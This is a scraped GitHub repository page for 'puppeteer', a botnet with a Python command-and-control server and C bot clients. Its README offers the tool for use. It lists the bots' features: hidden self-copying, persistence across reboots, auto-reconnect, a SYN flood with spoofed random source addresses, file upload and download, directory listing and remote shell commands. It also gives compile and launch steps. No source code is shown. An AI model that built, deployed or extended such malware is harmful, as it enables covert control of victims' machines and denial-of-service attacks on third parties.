Skip to content

Implementation of a Botnet written in C and Python

License

Notifications You must be signed in to change notification settings

arthur-bryan/puppeteer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

puppet Codacy Badge Open Source Status Badge GitHub release (latest SemVer) GitHub tag (latest by date) GitHub License Python Badge C Badge GitHub repo size

:octocat: Puppeteer

Implementation of a botnet with the C&C server (puppeteer) written in Python and the bots (puppets) code written in C

  • ✔️ Interact with puppets while keeps listening incoming connections
  • ✔️ Interact with one or all puppets at a time
  • ✔️ Executable makes a copy of itself to a hidden folder
  • ✔️ Store/update puppets information as soon as the puppet connect
  • ✔️ Puppets will run the backdoor automatically at reboots
  • ✔️ Puppets attempts to reconnect automatically in case of connection lost
  • ✔️ SYN Flood attack with random generated IP Address
  • ✔️ Download/Upload files up to 4 GB from/to puppets
  • ✔️ List all files (and sizes and permissions) of the puppets directories
  • ✔️ Run shell commands on the puppets

🛠️ Installation/compilation

Compiling sources for puppet executables:

git clone https://github.com/arthur-bryan/puppeteer
cd botnet
make

By default, the make command will compile for Linux 64 bits. If you want to compile for 32 bits (Windows 32/64 bits are not avaliable yet) follow these steps:

chmod +x install.sh
sudo ./install.sh
make OUTPUT=linux32

The compiled binaries will be stored at the bin folder

💻 Usage

PS: Server IP Address / Port are defined at puppets/linux/include/sockets.h

Start the server

cd botnet
python3 main.py

Wait or make an bot execute the compiled binary then starts interaction

DEMO

©️ License

MIT License

🚧 In progress

  • ⏳ Puppet sources for Windows